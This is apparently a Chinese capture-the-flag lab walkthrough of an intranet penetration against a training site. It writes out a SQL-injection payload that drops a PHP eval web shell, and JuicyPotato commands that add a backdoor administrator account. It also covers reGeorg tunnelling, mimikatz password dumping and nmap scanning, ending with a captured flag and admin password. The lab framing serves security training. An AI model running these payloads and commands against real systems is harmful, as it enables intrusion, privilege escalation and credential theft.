【内网渗透上WP】（基础知识+靶场操作完整版）SQL拿shell、WIN提权

一、基础知识

1、SQL拿SHELL

两个常用的注入函数

into outfile 将一句话木马写入 自动创建的 heason.php文件中

http://afsgr16-b1ferw.aqlab.cn/?id=1 and 1=2 union select 1,'<?php @eval($_REQUEST[8]);?>' into outfile ‘C:\\phpStudy\\WWW\\heason.php’

注意点：

• 1.上传文件路径，需要测试网站报错显示路径
• 2.路径需双写

into dumpfile 使用同上，区别是能接受16进制

http://afsgr16-b1ferw.aqlab.cn/?id=1 and 1=2 union select 1,0x3c3f70687020406576616c28245f524551554553545b27636d64275d293b3f3e into outfile ‘C:\\phpStudy\\WWW\\heason.php’

注意点：

• 1.16进制转换时，需注意空格是否保留，没有空格木马会失效
• 2.小细节16进制前别忘加0x

2、Win常用命令与提权

（1）常用命令

whoami 查看当前用户权限
netstat -ano 查看本机开放的端口
tasklist 查看本机运行的程序[类似于任务管理器]
systeminfo 查看计算机信息
net user 查看本机所有用户及权限

（2）提权路线

• 第一种：不同服务组件用了不同权限。例如网站权限低，数据库权限高，那么我们就要想办法让其他组件帮我们去做事。再例如：目标机器上运行了一些其他的服务，然后这些服务只能从内部访问，然后我们也可以调用过来用。(例如：FTP|Redis等等) [这个需要一定的知识积累，早期不推荐]

• 第二种：利用Window的漏洞(最常见手法)，查看windows打了什么补丁，然后去网上找存在什么样的漏洞，再找对应的提权工具。

推荐软件：JuicyPotato

利用菜刀将程序 JuicyPotato.exe 上传到目标机器上，在运行这个程序，即可执行后续操作，常用命令如下

JuicyPotato.exe -p “whoami”  //将现有账号权限提升至system
JuicyPotato.exe -p “net user 账号名 密码 /add” //新增账号和对应密码
JuicyPotato.exe -p “net localgroup administrators 账号名密码 /add”  //提升新增账号的权限至administrators组

【本帖使用第二种提权路线】菜刀或蚁剑链接后，往往权限较低，如guest，需要做下列事后才能支持后续的操作。

（1）现有账号提权：方便后续各种命令使用

（2）新增账号并将其提权：后续远程登录使用的账号

（3）查询该机器打的补丁，网上搜寻还有哪些已知漏洞可以直接利用。推荐搜索网站https://bugs.hacking8.com/tiquan/

3、内网与外网通信

内网往往有较多机器，但是只有一个路由负责端口转发连接至公网。这造成外网发起的访问只能访问这个路由指定的机器，而不能连接至其他机器。同时内网向外发起的连接则由这个路由进行端口映射，众多内网机器共用相同的IP进行对外网络连接。更有一种可能，有的内网机器根本不能连接外网。以上种种，就造成了，你通过菜刀或蚁剑实际控制的一个内网机器，但是却无法通过外网进行远程登录。为解决这种问题，下面有三种方式可以解决

（1）让内网的目标机器主动连接外网主机，这种情况需要一个外网IP地址。我们可以自行去购买外网IP。或者去找个学生身份或者是岁数低于24岁的小妹妹、弟弟去买阿里云学生机。

（2）利用网上的内网穿透平台，通过他们提供的服务，将我们使用的攻击机器的ip、端口与平台提供的ip、端口绑定。并在攻击机器开启监听这个本地端口。同时让内网目标机器主动连接这个平台，当目标内网机器主动连接这个平台时，我们就能监听到了。此处推荐平台https://qydev.com/index.html

（3）通过菜刀或蚁剑等，直接上传代理，通过代理进行攻击机与目标内网机器的通信。此处推荐使用软件reGeorg配合Proxifier进行使用。（此种方法会在后面演示时展示如何使用）

4、探测内网机器并抓取本机管理员账号和密码

推荐使用nmap和工具 minikatz，具体使用见后

二、内网渗透流程及靶场演示

1、进入靶场利用sql的into outfile/dumpfile 写入一句话木马

写入一句话木马：

http://afsgr16-b1ferw.aqlab.cn/?id=1 and 1=2 union select 1,'<?php @eval($_REQUEST[8]);?>' into outfile 'C:\\phpStudy\\WWW\\heason.php'

验证是否成功：

http://afsgr16-b1ferw.aqlab.cn/heason.php?8=phpinfo();

2、利用蚁剑拿下SHELL

3、查看系统信息和开放端口，查看打的补丁，搜索可利用已知漏洞

systeminfo

netstat -ano

通过辅助提权网站，对exp进行寻找。

4、利用蚁剑传入JuicyPotato,并使用其虚拟终端，查看权限，提权。

上传JuicyPotato成功

使用账号提权成功

JuicyPotato.exe -p “whoami”

创建新账号heason 并提权

JuicyPotato.exe -p “net user heason A123456!!! /add” //新增账号和对应密码
JuicyPotato.exe -p “net localgroup administrators heason /add”//提升新增账号的权限至administrators组

查询目标机器内网ip

5、使用软件reGeorg实现攻击机与目标机器的通信

通过蚁剑上传tunnel.nosocket.php并改名为tn.php(方便后续使用)

本地reGeorg目录起cmd开启通讯

python2 reGeorgSocksProxy.py -l 127.0.0.1 -p 10086 -u http://afsgr16-b1ferw.aqlab.cn/tn.php

注意点：

这里用的是python2,我电脑之前用的是python3 启动会报错，如何在电脑中同时安装2和3，请参考帖子https://jingyan.baidu.com/article/c1a3101e7dd290de656debdd.html?qq-pf-to=pcqq.c2c
如果在执行时，py2缺乏库，又没有pip,建议网上搜索如何安装pip,之后再设置环境变量。如有问题可留言。

6、使用软件Proxifier监听10086端口

首先 设置配置文件->代理服务器

然后 设置配置文件->代理规则

7、好了，可以开启远程桌面连接了

使用建好的 heason A123456!!!登陆哦

8、复制进去工具 minikatz ，右键已管理员启动

privilege::debug 提升权限
sekurlsa::logonpasswords 抓取密码

9.传入nmap,扫描网段找出内网其他机器

Nmap 10.0.1./24

10.抓到密码

administrator的密码是woshifengge1.
最后在10.0.1.8里面拿到flag
flag{You_good}

完结 撒花！！！